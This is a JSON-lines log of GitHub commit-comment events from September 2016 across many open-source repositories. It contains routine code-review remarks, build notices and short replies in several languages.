{"id":"4583482058","type":"CommitCommentEvent","actor":{"login":"dkayiwa"},"repo":{"name":"openmrs/openmrs-core"},"payload":{"comment":{"id":19079062,"position":null,"line":null,"path":null,"commit_id":"e6fc3869109c616db5030b6fd9e277a2e39ef3b5","created_at":"2016-09-19T14:04:14Z","updated_at":"2016-09-19T14:04:14Z","body":"@rkorytkowski when i first got the error i remembered that you committed a fix for something like that. So i pulled in your changes. But even after this, i still got the same exact error. In my case, i was compiling a module on platform 2.0 but with the reporting module dependency being an older version which was not platform 2.0 ready. I can comfortably reproduce it by reverting to the older version of the reporting module."}},"created_at":"2016-09-19T14:04:14Z"}
{"id":"4583482202","type":"CommitCommentEvent","actor":{"login":"jacklam718"},"repo":{"name":"jacklam718/react-native-popup-dialog"},"payload":{"comment":{"id":19079064,"position":null,"line":null,"path":null,"commit_id":"284417ae70d1eab8b0c0fdb9e18ea8601035d741","created_at":"2016-09-19T14:04:16Z","updated_at":"2016-09-19T14:04:16Z","body":"@aviadhahami I will seriously consider it, thanks."}},"created_at":"2016-09-19T14:04:16Z"}
{"id":"4583485451","type":"CommitCommentEvent","actor":{"login":"vzhilin"},"repo":{"name":"ValentinaSbLn/ThirdLab"},"payload":{"comment":{"id":19079067,"position":13,"line":36,"path":"src/collections/FourthTask.java","commit_id":"7cf5ec7a6e6b13e03fed400199fe64c53869a28f","created_at":"2016-09-19T14:04:38Z","updated_at":"2016-09-19T14:04:38Z","body":"Попробуйте тоже самое, но с Deque.descendingIterator."}},"created_at":"2016-09-19T14:04:38Z"}
{"id":"4583487075","type":"CommitCommentEvent","actor":{"login":"pattacini"},"repo":{"name":"robotology/yarp"},"payload":{"comment":{"id":19079072,"position":null,"line":null,"path":null,"commit_id":"b3bb5f1361a4b11f6d93ba235c4464c74eaf6c85","created_at":"2016-09-19T14:04:54Z","updated_at":"2016-09-19T14:04:54Z","body":"Without them, **`cer`** does not compile: see the [**textimage**](https://github.com/robotology/cer/blob/master/modules/textimage/CMakeLists.txt) module.\r\n\r\nIt's quite important to have everything in place because of the NVIDIA demo.\r\nCan we find out an **immediate** solution for that? 😄 \r\n\r\ncc @randaz81 @vtikha "}},"created_at":"2016-09-19T14:04:54Z"}
{"id":"4583487259","type":"CommitCommentEvent","actor":{"login":"rochestb"},"repo":{"name":"derdav3/react-native-camera"},"payload":{"comment":{"id":19079073,"position":null,"line":null,"path":null,"commit_id":"5ce74846e4fb588cd673de04c709d624a65c17b3","created_at":"2016-09-19T14:04:55Z","updated_at":"2016-09-19T14:04:55Z","body":"Wow, that is all it takes!? Thanks for putting that PR in, definitely gonna use it!"}},"created_at":"2016-09-19T14:04:55Z"}
{"id":"4583495313","type":"CommitCommentEvent","actor":{"login":"vjt"},"repo":{"name":"ifad/chronomodel"},"payload":{"comment":{"id":19079086,"position":null,"line":null,"path":null,"commit_id":"322b971c9ed810ce505a9b64a53683c456254bf6","created_at":"2016-09-19T14:06:26Z","updated_at":"2016-09-19T14:06:26Z","body":"Yes!"}},"created_at":"2016-09-19T14:06:26Z"}
{"id":"4583505342","type":"CommitCommentEvent","actor":{"login":"Rocky640"},"repo":{"name":"Rocky640/Stockfish"},"payload":{"comment":{"id":19079115,"position":null,"line":null,"path":null,"commit_id":"9549ac897cfaace21617375de8460c35c617f01d","created_at":"2016-09-19T14:08:05Z","updated_at":"2016-09-19T14:08:05Z","body":"Ah...not completely exact yet.\r\nOn line 76:\r\n`return min_attacker<Pt>(bb, to, stmAttackers ^ a, occupied, attackers, snipers, ksq);`\r\n\r\n\"a\" is removed for the remaining of the sequence, but \"a\" may eventually get unpinned later on.\r\nNeed to think about that one, and find out how many times this happens.\r\n"}},"created_at":"2016-09-19T14:08:05Z"}
{"id":"4583509838","type":"CommitCommentEvent","actor":{"login":"Snake1999"},"repo":{"name":"Nukkit/Nukkit"},"payload":{"comment":{"id":19079125,"position":null,"line":null,"path":null,"commit_id":"60c98f4575584688d5c387ba380e716af2dfbb35","created_at":"2016-09-19T14:08:50Z","updated_at":"2016-09-19T14:08:50Z","body":":+1:"}},"created_at":"2016-09-19T14:08:50Z"}
{"id":"4583510504","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19079126,"position":null,"line":null,"path":null,"commit_id":"30579321f8289a0985d74ff7613bdd3051865354","created_at":"2016-09-19T14:08:57Z","updated_at":"2016-09-19T14:08:57Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1047](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13557&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 240, ignored: 3 Build time: 00:08:57"}},"created_at":"2016-09-19T14:08:57Z"}
{"id":"4583512458","type":"CommitCommentEvent","actor":{"login":"devxoul"},"repo":{"name":"dkhamsing/open-source-ios-apps"},"payload":{"comment":{"id":19079130,"position":null,"line":null,"path":null,"commit_id":"c7452c68972ba19d73ec1cd0afac0ebe40e93c1f","created_at":"2016-09-19T14:09:20Z","updated_at":"2016-09-19T14:09:20Z","body":"Thanks!"}},"created_at":"2016-09-19T14:09:20Z"}
{"id":"4583515045","type":"CommitCommentEvent","actor":{"login":"giuseppeM99"},"repo":{"name":"giuseppeM99/s-uzzbot"},"payload":{"comment":{"id":19079138,"position":null,"line":null,"path":null,"commit_id":"7749e6ccd98cf5cd8e04df8e3fd7c903eecee5c0","created_at":"2016-09-19T14:09:46Z","updated_at":"2016-09-19T14:09:46Z","body":"While a media message is send, the \"text\" variable is nil and gives an error that block the execution of the antispam/antiflood plugin\r\n\r\nadded an exeption for that"}},"created_at":"2016-09-19T14:09:46Z"}
{"id":"4583520265","type":"CommitCommentEvent","actor":{"login":"bittner"},"repo":{"name":"pytest-dev/cookiecutter-pytest-plugin"},"payload":{"comment":{"id":19079149,"position":22,"line":14,"path":"pytest-{{cookiecutter.plugin_name}}/.travis.yml","commit_id":"f0d81383d93fda51d875c9a1bd79d07eac9e31bb","created_at":"2016-09-19T14:10:45Z","updated_at":"2016-09-19T14:10:45Z","body":"If you use `TOXENV` (instead of `TOX_ENV`) you can even omit the \"-e $TOX_ENV\".\r\n\r\nSee the [examples in the tox docs](https://testrun.org/tox/latest/example/general.html#selecting-one-or-more-environments-to-run-tests-against)."}},"created_at":"2016-09-19T14:10:45Z"}
{"id":"4583525570","type":"CommitCommentEvent","actor":{"login":"luis-pereira"},"repo":{"name":"lxde/lxqt-panel"},"payload":{"comment":{"id":19079167,"position":61,"line":223,"path":"CMakeLists.txt","commit_id":"14878e2aafb69dd65753fe3d126355675bb97c89","created_at":"2016-09-19T14:11:42Z","updated_at":"2016-09-19T14:11:42Z","body":"@palinek `find_package(PulseAudio REQUIRED)` is enough. Doc [here](https://cmake.org/cmake/help/v3.0/command/find_package.html)"}},"created_at":"2016-09-19T14:11:42Z"}
{"id":"4583527779","type":"CommitCommentEvent","actor":{"login":"derdav3"},"repo":{"name":"derdav3/react-native-camera"},"payload":{"comment":{"id":19079174,"position":null,"line":null,"path":null,"commit_id":"5ce74846e4fb588cd673de04c709d624a65c17b3","created_at":"2016-09-19T14:12:05Z","updated_at":"2016-09-19T14:12:05Z","body":"haha honestly I had no idea.. it was just a lucky punch - but works! (no idea about iOS 9 though)"}},"created_at":"2016-09-19T14:12:05Z"}
{"id":"4583528979","type":"CommitCommentEvent","actor":{"login":"vzhilin"},"repo":{"name":"ValentinaSbLn/ThirdLab"},"payload":{"comment":{"id":19079175,"position":23,"line":23,"path":"src/collections/FifthTask.java","commit_id":"ddc9eea201ef17c2a00c608bd2344d8353e78f9f","created_at":"2016-09-19T14:12:19Z","updated_at":"2016-09-19T14:12:19Z","body":"Вы реализовали свой класс списка. MyArrayListWithItr уже не List.\r\nРеализуйте свой Iterator в качестве отдельного класса. Он принимает на вход уже созданный список, реализация которого не известна."}},"created_at":"2016-09-19T14:12:19Z"}
{"id":"4583539324","type":"CommitCommentEvent","actor":{"login":"Jigneshsoni308"},"repo":{"name":"Jigneshsoni308/datasciencecoursera"},"payload":{"comment":{"id":19079196,"position":null,"line":null,"path":null,"commit_id":"8063b39010a1c429c3884309e9d875412aa583e5","created_at":"2016-09-19T14:13:59Z","updated_at":"2016-09-19T14:13:59Z","body":"rm HelloWrold.md"}},"created_at":"2016-09-19T14:13:59Z"}
{"id":"4583541130","type":"CommitCommentEvent","actor":{"login":"valgur"},"repo":{"name":"ibamacsr/sentinelsat"},"payload":{"comment":{"id":19079203,"position":66,"line":71,"path":"sentinelsat/sentinel.py","commit_id":"d0f63e25771c441b4d778c8c257e3432810e1b8e","created_at":"2016-09-19T14:14:19Z","updated_at":"2016-09-19T14:14:19Z","body":"Hm... I'll take a look try to fix it in a few days. I'm also thinking that it might be a good idea to return an APIError here and elsewhere for server-side issues instead of ValueError/HTTPError. Something like https://github.com/Qordobacode/api-sdk-python/blob/master/QordobaLib/APIException.py perhaps (just a random example)."}},"created_at":"2016-09-19T14:14:19Z"}
{"id":"4583544265","type":"CommitCommentEvent","actor":{"login":"nobuti"},"repo":{"name":"CartoDB/cartodb"},"payload":{"comment":{"id":19079210,"position":5,"line":196,"path":"lib/assets/javascripts/cartodb3/components/code-mirror/show-hint.code-mirror.js","commit_id":"f8f5f9039897d4d87ca85d65178a4f143d8b4e24","created_at":"2016-09-19T14:14:50Z","updated_at":"2016-09-19T14:14:50Z","body":"this is weird..."}},"created_at":"2016-09-19T14:14:50Z"}
{"id":"4583546627","type":"CommitCommentEvent","actor":{"login":"vtikha"},"repo":{"name":"robotology/yarp"},"payload":{"comment":{"id":19079213,"position":null,"line":null,"path":null,"commit_id":"b3bb5f1361a4b11f6d93ba235c4464c74eaf6c85","created_at":"2016-09-19T14:15:19Z","updated_at":"2016-09-19T14:15:19Z","body":"yes... 👊 @drdanz 😄 "}},"created_at":"2016-09-19T14:15:19Z"}
{"id":"4583548076","type":"CommitCommentEvent","actor":{"login":"miclaus"},"repo":{"name":"fhstp-mfg/mobilot"},"payload":{"comment":{"id":19079216,"position":14,"line":28,"path":"public/app/modules/mobidul/station/creator/directives/EditorDirective.js","commit_id":"f785aa619aab82433a73cf66b04f660b3d603d81","created_at":"2016-09-19T14:15:34Z","updated_at":"2016-09-19T14:15:34Z","body":"@abisz @doomsayer2 I decided to keep this option, since it doesn't hurt and it's scalable for the future. \r\n\r\nATM it will always show the station states, when the Mobidul mode is `rally` – Basically the same as not showing the station states, if there is only one state.\r\n\r\nSee commit 5bbf40b"}},"created_at":"2016-09-19T14:15:34Z"}
{"id":"4583548567","type":"CommitCommentEvent","actor":{"login":"Tabrizian"},"repo":{"name":"AoLab/I1820-RPi"},"payload":{"comment":{"id":19079217,"position":null,"line":null,"path":null,"commit_id":"3c52a7c4cfcbc4ff7373e580fdfa61e804079c94","created_at":"2016-09-19T14:15:38Z","updated_at":"2016-09-19T14:15:38Z","body":"Nasty :(\r\n"}},"created_at":"2016-09-19T14:15:38Z"}
{"id":"4583549555","type":"CommitCommentEvent","actor":{"login":"tdsmith"},"repo":{"name":"Homebrew/homebrew-core"},"payload":{"comment":{"id":19079222,"position":null,"line":null,"path":null,"commit_id":"f2b7124374a1d2d8dd60844a07514f2752e50d3c","created_at":"2016-09-19T14:15:47Z","updated_at":"2016-09-19T14:15:47Z","body":"Please open a PR or an issue for the ones you need, if you need\nfunctionality they provide.\n\nOn Mon, Sep 19, 2016, 04:03 Robin Wallin <notifications@github.com> wrote:\n\n> @tdsmith <https://github.com/tdsmith> at least \"zabbix-api\", \"xmltodict\"\n> and \"pywinrm\" were lost in the sort, possibly more.\n>\n> 293 additions and 336 deletions.\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/Homebrew/homebrew-core/commit/f2b7124374a1d2d8dd60844a07514f2752e50d3c#commitcomment-19076889>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAKnQSdnUsSZd7GfikUFosPneynvOdDVks5qrmwOgaJpZM4KAXXN>\n> .\n>\n"}},"created_at":"2016-09-19T14:15:47Z"}
{"id":"4583549764","type":"CommitCommentEvent","actor":{"login":"Xverso111"},"repo":{"name":"Xverso111/JavaProject"},"payload":{"comment":{"id":19079223,"position":4,"line":0,"path":"src/AppleFilter.java","commit_id":"0eb0a6cfd9b96e337ba513f983c756f94c5041d8","created_at":"2016-09-19T14:15:50Z","updated_at":"2016-09-19T14:15:50Z","body":"mejor hacer una clase abstracta"}},"created_at":"2016-09-19T14:15:50Z"}
{"id":"4583549875","type":"CommitCommentEvent","actor":{"login":"danfsd"},"repo":{"name":"jonkykong/SideMenu"},"payload":{"comment":{"id":19079225,"position":null,"line":null,"path":null,"commit_id":"596c20cbbb291baeed5d64515c86960b043127f7","created_at":"2016-09-19T14:15:51Z","updated_at":"2016-09-19T14:15:51Z","body":"Is it working on **Swift 3**?"}},"created_at":"2016-09-19T14:15:51Z"}
{"id":"4583550026","type":"CommitCommentEvent","actor":{"login":"justinclift"},"repo":{"name":"sqlitebrowser/sqlitebrowser"},"payload":{"comment":{"id":19079226,"position":4,"line":862,"path":"src/MainWindow.cpp","commit_id":"55d8905b904ac57cf759db3b235b1ce27ab8c8a5","created_at":"2016-09-19T14:15:52Z","updated_at":"2016-09-19T14:15:52Z","body":"Sure, if you have a solution, then go for it. :smile:\r\n\r\nAt a guess, is it using a regex to figure out which lines are/aren't part of the statement?"}},"created_at":"2016-09-19T14:15:52Z"}
{"id":"4583553646","type":"CommitCommentEvent","actor":{"login":"Yourdimitrov"},"repo":{"name":"Yourdimitrov/test-repo"},"payload":{"comment":{"id":19079230,"position":null,"line":null,"path":null,"commit_id":"e1c159db2f59ff471f12fe29e6ae88639ec44216","created_at":"2016-09-19T14:16:29Z","updated_at":"2016-09-19T14:16:29Z","body":"nice work"}},"created_at":"2016-09-19T14:16:29Z"}
{"id":"4583557682","type":"CommitCommentEvent","actor":{"login":"Revanth97"},"repo":{"name":"Akash-Sinha/AndroidTraining-2016-17"},"payload":{"comment":{"id":19079239,"position":null,"line":null,"path":null,"commit_id":"9f6ecedecc7d9601c72a3019b4b69b02ed0fb269","created_at":"2016-09-19T14:17:12Z","updated_at":"2016-09-19T14:17:12Z","body":"@MKRISH547  , could you please not directly post your source codes here? People would just copy paste them. No offence intended."}},"created_at":"2016-09-19T14:17:12Z"}
{"id":"4583558113","type":"CommitCommentEvent","actor":{"login":"vzhilin"},"repo":{"name":"Seaqer/HWLess_3"},"payload":{"comment":{"id":19079241,"position":8,"line":8,"path":"src/com/sbt/Homework.java","commit_id":"3c71526b32de154f4af2e6b843b1ca422f6d3b8b","created_at":"2016-09-19T14:17:16Z","updated_at":"2016-09-19T14:17:16Z","body":"Класс должен делать только одно дело, но делать это дело хорошо => неправильно всё в одном месте хранить – на каждое задание свой класс."}},"created_at":"2016-09-19T14:17:16Z"}
{"id":"4583559897","type":"CommitCommentEvent","actor":{"login":"li-xinyang"},"repo":{"name":"awpsawps12/FE_React_Todo"},"payload":{"comment":{"id":19079244,"position":27,"line":27,"path":"gulpfile.js","commit_id":"d2ca63ea26d4e676868b578044094132e0201e51","created_at":"2016-09-19T14:17:35Z","updated_at":"2016-09-19T14:17:35Z","body":"那啥 React 不是和 Webpack 配合最佳吗？你为啥不用勒？"}},"created_at":"2016-09-19T14:17:35Z"}
{"id":"4583561331","type":"CommitCommentEvent","actor":{"login":"Xverso111"},"repo":{"name":"Xverso111/JavaProject"},"payload":{"comment":{"id":19079250,"position":4,"line":0,"path":"src/AppleFilter.java","commit_id":"0eb0a6cfd9b96e337ba513f983c756f94c5041d8","created_at":"2016-09-19T14:17:48Z","updated_at":"2016-09-19T14:17:48Z","body":"@{b769872e-b937-48fc-baa9-b2378c75d5ca,Pablo - reviewer} mejor interfaz"}},"created_at":"2016-09-19T14:17:48Z"}
{"id":"4583563363","type":"CommitCommentEvent","actor":{"login":"andres-erbsen"},"repo":{"name":"mit-plv/fiat-crypto"},"payload":{"comment":{"id":19079260,"position":8,"line":67,"path":"src/Util/Notations.v","commit_id":"361a3a4b2d7b171fb0cd510beeb8e039088c2517","created_at":"2016-09-19T14:18:10Z","updated_at":"2016-09-19T14:18:10Z","body":"@JasonGross \r\nI am guessing this change caused the 8.4.* [build failure](https://travis-ci.org/mit-plv/fiat-crypto/jobs/160920317#L907) in [FancyMachine256/Barrett.v](https://github.com/mit-plv/fiat-crypto/blame/master/src/Specific/FancyMachine256/Barrett.v#L7)."}},"created_at":"2016-09-19T14:18:10Z"}
{"id":"4583563706","type":"CommitCommentEvent","actor":{"login":"li-xinyang"},"repo":{"name":"awpsawps12/FE_React_Todo"},"payload":{"comment":{"id":19079262,"position":7,"line":7,"path":"index.html","commit_id":"d2ca63ea26d4e676868b578044094132e0201e51","created_at":"2016-09-19T14:18:15Z","updated_at":"2016-09-19T14:18:15Z","body":"你这样子做不是就不能 `require` 了吗？ "}},"created_at":"2016-09-19T14:18:15Z"}
{"id":"4583566762","type":"CommitCommentEvent","actor":{"login":"Tarik02"},"repo":{"name":"iTXTech/Genisys"},"payload":{"comment":{"id":19079272,"position":null,"line":null,"path":null,"commit_id":"e10dcd091c0b4cd2199c5d803f3a5463c64e5390","created_at":"2016-09-19T14:18:45Z","updated_at":"2016-09-19T14:18:45Z","body":"```\r\nconst TELEMETRY_EVENT_PACKET = 0x3c; //EventPacket... what?\r\n```\r\nIt's event when other entity is teleporting to other dimension."}},"created_at":"2016-09-19T14:18:45Z"}
{"id":"4583571689","type":"CommitCommentEvent","actor":{"login":"li-xinyang"},"repo":{"name":"awpsawps12/FE_React_Todo"},"payload":{"comment":{"id":19079285,"position":56,"line":56,"path":"src/index.jsx","commit_id":"d2ca63ea26d4e676868b578044094132e0201e51","created_at":"2016-09-19T14:19:35Z","updated_at":"2016-09-19T14:19:35Z","body":"这里锁进有问题"}},"created_at":"2016-09-19T14:19:35Z"}
{"id":"4583574741","type":"CommitCommentEvent","actor":{"login":"MKRISH547"},"repo":{"name":"Akash-Sinha/AndroidTraining-2016-17"},"payload":{"comment":{"id":19079297,"position":null,"line":null,"path":null,"commit_id":"9f6ecedecc7d9601c72a3019b4b69b02ed0fb269","created_at":"2016-09-19T14:20:08Z","updated_at":"2016-09-19T14:20:08Z","body":"Oh..sorry for your inconvenience...where I can upload my exercises?...or\nthere is no need of uploading plz inform to me\n\nOn 19 Sep 2016 7:47 p.m., \"Revanth Murigipudi\" <notifications@github.com>\nwrote:\n\n> @MKRISH547 <https://github.com/MKRISH547> , could you please not directly\n> post your source codes here? People would just copy paste them. No offence\n> intended.\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/Akash-Sinha/AndroidTraining-2016-17/commit/9f6ecedecc7d9601c72a3019b4b69b02ed0fb269#commitcomment-19079239>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AVMD3V0psyuB-fVUI9T4R-io36916T7kks5qrplogaJpZM4KANR1>\n> .\n>\n"}},"created_at":"2016-09-19T14:20:08Z"}
{"id":"4583575148","type":"CommitCommentEvent","actor":{"login":"ppoffice"},"repo":{"name":"ppoffice/hexo-theme-icarus"},"payload":{"comment":{"id":19079299,"position":null,"line":null,"path":null,"commit_id":"6372aed702d63adb4acc733172038b58647da4ed","created_at":"2016-09-19T14:20:13Z","updated_at":"2016-09-19T14:20:13Z","body":"#191 "}},"created_at":"2016-09-19T14:20:13Z"}
{"id":"4583579355","type":"CommitCommentEvent","actor":{"login":"PlanetEfficacy"},"repo":{"name":"PlanetEfficacy/little_shop"},"payload":{"comment":{"id":19079314,"position":17,"line":9,"path":"app/controllers/orders_controller.rb","commit_id":"efc29e5cc5b21153297ad8833eaa7cddbf1f1828","created_at":"2016-09-19T14:20:56Z","updated_at":"2016-09-19T14:20:56Z","body":"I think populate_item_order is not what it is doing... the order compiler takes a cart and turns it into an order. I went with create because it is creating an order. Generate makes sense to me as well. I'll re push w/ generate."}},"created_at":"2016-09-19T14:20:56Z"}
{"id":"4583579383","type":"CommitCommentEvent","actor":{"login":"adamvy"},"repo":{"name":"foam-framework/foam2-experimental"},"payload":{"comment":{"id":19079315,"position":29,"line":49,"path":"src/foam/u2/AttrSlot.js","commit_id":"27f72d42a1e56d555412ccf1e1e2a602c28a4428","created_at":"2016-09-19T14:20:56Z","updated_at":"2016-09-19T14:20:56Z","body":"This could cause duplicate listeners on the DOM if someone does\r\n\r\n.sub(l);\r\n.unsub(l);\r\n.sub(l);\r\n\r\nwe'll end up with two DOM listeners."}},"created_at":"2016-09-19T14:20:56Z"}
{"id":"4583579894","type":"CommitCommentEvent","actor":{"login":"dktapps"},"repo":{"name":"iTXTech/Genisys"},"payload":{"comment":{"id":19079317,"position":null,"line":null,"path":null,"commit_id":"e10dcd091c0b4cd2199c5d803f3a5463c64e5390","created_at":"2016-09-19T14:21:01Z","updated_at":"2016-09-19T14:21:01Z","body":"@Tarik02 nonsense. Look at a disassembly."}},"created_at":"2016-09-19T14:21:01Z"}
{"id":"4583581297","type":"CommitCommentEvent","actor":{"login":"luismorenovinus"},"repo":{"name":"desarrollovinus/predios"},"payload":{"comment":{"id":19079321,"position":null,"line":null,"path":null,"commit_id":"1654e5c215478f3d4fbfd56a778fe9fd65194613","created_at":"2016-09-19T14:21:17Z","updated_at":"2016-09-19T14:21:17Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;MC2Lvm6K&#x2F;30-modificacion-regenerar-imagen-de-convenciones-para-los-kml\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> (Modificación) Regenerar imagen de convenciones para los KML</a>"}},"created_at":"2016-09-19T14:21:17Z"}
{"id":"4583581948","type":"CommitCommentEvent","actor":{"login":"PlanetEfficacy"},"repo":{"name":"PlanetEfficacy/little_shop"},"payload":{"comment":{"id":19079325,"position":28,"line":26,"path":"app/models/order_compiler.rb","commit_id":"efc29e5cc5b21153297ad8833eaa7cddbf1f1828","created_at":"2016-09-19T14:21:24Z","updated_at":"2016-09-19T14:21:24Z","body":"Cool, lets go with generate."}},"created_at":"2016-09-19T14:21:24Z"}
{"id":"4583582373","type":"CommitCommentEvent","actor":{"login":"bolkedebruin"},"repo":{"name":"apache/incubator-airflow"},"payload":{"comment":{"id":19079330,"position":null,"line":null,"path":null,"commit_id":"4905a5563d47b45e38b91661ee5aa7f3765a129b","created_at":"2016-09-19T14:21:28Z","updated_at":"2016-09-19T14:21:28Z","body":"Good catch. It is mainly that we do this for readability of the logs. In previous versions it used to be 50 characters, so this is my bad."}},"created_at":"2016-09-19T14:21:28Z"}
{"id":"4583582965","type":"CommitCommentEvent","actor":{"login":"clanzen"},"repo":{"name":"clanzen/demoApp"},"payload":{"comment":{"id":19079332,"position":null,"line":null,"path":null,"commit_id":"c9a9fe5685c1bc880460c55dea9620be168509aa","created_at":"2016-09-19T14:21:34Z","updated_at":"2016-09-19T14:21:34Z","body":"commit comment from craig"}},"created_at":"2016-09-19T14:21:34Z"}
{"id":"4583583382","type":"CommitCommentEvent","actor":{"login":"PlanetEfficacy"},"repo":{"name":"PlanetEfficacy/little_shop"},"payload":{"comment":{"id":19079333,"position":33,"line":25,"path":"spec/models/order_compiler_spec.rb","commit_id":"efc29e5cc5b21153297ad8833eaa7cddbf1f1828","created_at":"2016-09-19T14:21:37Z","updated_at":"2016-09-19T14:21:37Z","body":"agreed."}},"created_at":"2016-09-19T14:21:37Z"}
{"id":"4583586490","type":"CommitCommentEvent","actor":{"login":"kaedroho"},"repo":{"name":"torchbox/verdant-rca"},"payload":{"comment":{"id":19079343,"position":null,"line":null,"path":null,"commit_id":"b4aa7c395056db4b401e600857a8afba5f231d30","created_at":"2016-09-19T14:22:10Z","updated_at":"2016-09-19T14:22:10Z","body":"Oops, forgot to amend the commit message. Don't worry, this one is safe to merge :)"}},"created_at":"2016-09-19T14:22:10Z"}
{"id":"4583589849","type":"CommitCommentEvent","actor":{"login":"walro"},"repo":{"name":"Homebrew/homebrew-core"},"payload":{"comment":{"id":19079358,"position":null,"line":null,"path":null,"commit_id":"f2b7124374a1d2d8dd60844a07514f2752e50d3c","created_at":"2016-09-19T14:22:44Z","updated_at":"2016-09-19T14:22:44Z","body":"Yes, created issue #4977 and subsequent PR #4979"}},"created_at":"2016-09-19T14:22:44Z"}
{"id":"4583590215","type":"CommitCommentEvent","actor":{"login":"ikhoon"},"repo":{"name":"edinanana/scala-sections"},"payload":{"comment":{"id":19079361,"position":null,"line":null,"path":null,"commit_id":"59ba79e46d53dae1564a7788119e64c65d5f8e87","created_at":"2016-09-19T14:22:48Z","updated_at":"2016-09-19T14:22:48Z","body":"👍 "}},"created_at":"2016-09-19T14:22:48Z"}
{"id":"4583590752","type":"CommitCommentEvent","actor":{"login":"rodneystrong"},"repo":{"name":"chewbcakjr/devmtn-scheduler"},"payload":{"comment":{"id":19079365,"position":null,"line":null,"path":null,"commit_id":"9891c72d21b264fd42523ec17d47c8a896b7afa8","created_at":"2016-09-19T14:22:53Z","updated_at":"2016-09-19T14:22:53Z","body":"That was IT !?!??! OF COURSE it's just an ng2 temp var to pass in... T__T)   Thanks @smrtsmrf "}},"created_at":"2016-09-19T14:22:53Z"}
{"id":"4583595588","type":"CommitCommentEvent","actor":{"login":"jar3817"},"repo":{"name":"jdolan/quetoo"},"payload":{"comment":{"id":19079387,"position":null,"line":null,"path":null,"commit_id":"cc3743210be6fdb755f4b0236e5d92a2f3f72550","created_at":"2016-09-19T14:23:42Z","updated_at":"2016-09-19T14:23:42Z","body":"*facepalm...."}},"created_at":"2016-09-19T14:23:42Z"}
{"id":"4583596286","type":"CommitCommentEvent","actor":{"login":"adamvy"},"repo":{"name":"foam-framework/foam2-experimental"},"payload":{"comment":{"id":19079393,"position":51,"line":207,"path":"src/core/Slot.js","commit_id":"27f72d42a1e56d555412ccf1e1e2a602c28a4428","created_at":"2016-09-19T14:23:49Z","updated_at":"2016-09-19T14:23:49Z","body":"My one concern with this is now we have different behaviours if you do\r\n\r\nobj.sub('propertyChange', 'foo', l);\r\nvs\r\nobj.foo$.sub(l);\r\n\r\nYour events src will be different based upon how you subscribe.\r\n\r\nIn fact your Cells demo depends upon this behaviour\r\n\r\nhttps://github.com/foam-framework/foam2-experimental/blob/master/src/com/google/foam/demos/sweeper/Board.js#L44\r\n\r\nIn the listeners cellIUncovered, you expect src. to be the object that the covered property belongs too."}},"created_at":"2016-09-19T14:23:49Z"}
{"id":"4583597368","type":"CommitCommentEvent","actor":{"login":"rodneystrong"},"repo":{"name":"chewbcakjr/devmtn-scheduler"},"payload":{"comment":{"id":19079398,"position":null,"line":null,"path":null,"commit_id":"cf2fba5d64920dac127e9b14b8ede4e1899ccb16","created_at":"2016-09-19T14:23:59Z","updated_at":"2016-09-19T14:23:59Z","body":"Wow.. Like really...  -___-)"}},"created_at":"2016-09-19T14:23:59Z"}
{"id":"4583598312","type":"CommitCommentEvent","actor":{"login":"ikhoon"},"repo":{"name":"ronnie-o/scala-exercises-std"},"payload":{"comment":{"id":19079404,"position":null,"line":null,"path":null,"commit_id":"1ec2b121c4bb4e409a40f9d32b809bbdee35cc3d","created_at":"2016-09-19T14:24:11Z","updated_at":"2016-09-19T14:24:11Z","body":"👍 "}},"created_at":"2016-09-19T14:24:11Z"}
{"id":"4583602178","type":"CommitCommentEvent","actor":{"login":"chrisdennis"},"repo":{"name":"chrisdennis/hibernate-orm"},"payload":{"comment":{"id":19079416,"position":47,"line":460,"path":"hibernate-core/src/main/java/org/hibernate/engine/spi/SessionFactoryImplementor.java","commit_id":"af74e5f9d61a92919b408f355827a4ad287f9cdb","created_at":"2016-09-19T14:24:50Z","updated_at":"2016-09-19T14:24:50Z","body":"The default strategy from the RegionFactory?  My understanding is that 'default' there means \"use this in the absence of any other user choice\", not \"which access strategy is at the top of some type-heirarchy such that it can safely access all other data stored by all other strategies\".  `AccessType.READ_ONLY` is the only thing logically close to that, and it has the added benefit of being likely to prevent modification of the cache through this channel.  This is the same approach used in `SessionFactoryImplementor` and `ConcurrentStatisticsImpl`."}},"created_at":"2016-09-19T14:24:50Z"}
{"id":"4583610265","type":"CommitCommentEvent","actor":{"login":"chrisdennis"},"repo":{"name":"chrisdennis/hibernate-orm"},"payload":{"comment":{"id":19079442,"position":255,"line":558,"path":"hibernate-core/src/main/java/org/hibernate/internal/CacheImpl.java","commit_id":"af74e5f9d61a92919b408f355827a4ad287f9cdb","created_at":"2016-09-19T14:26:16Z","updated_at":"2016-09-19T14:26:16Z","body":"Sorry, I was exposing some low end roots with the XORing.  Yes, this could be delegated, but I was trying to avoid making modifications to the SPI as much as possible."}},"created_at":"2016-09-19T14:26:16Z"}
{"id":"4583611982","type":"CommitCommentEvent","actor":{"login":"Xverso111"},"repo":{"name":"Xverso111/JavaProject"},"payload":{"comment":{"id":19079448,"position":4,"line":0,"path":"src/AppleFilter.java","commit_id":"a3ab6a269ad45344871bf3686c5e7eff1039901f","created_at":"2016-09-19T14:26:33Z","updated_at":"2016-09-19T14:26:33Z","body":"eliminar"}},"created_at":"2016-09-19T14:26:33Z"}
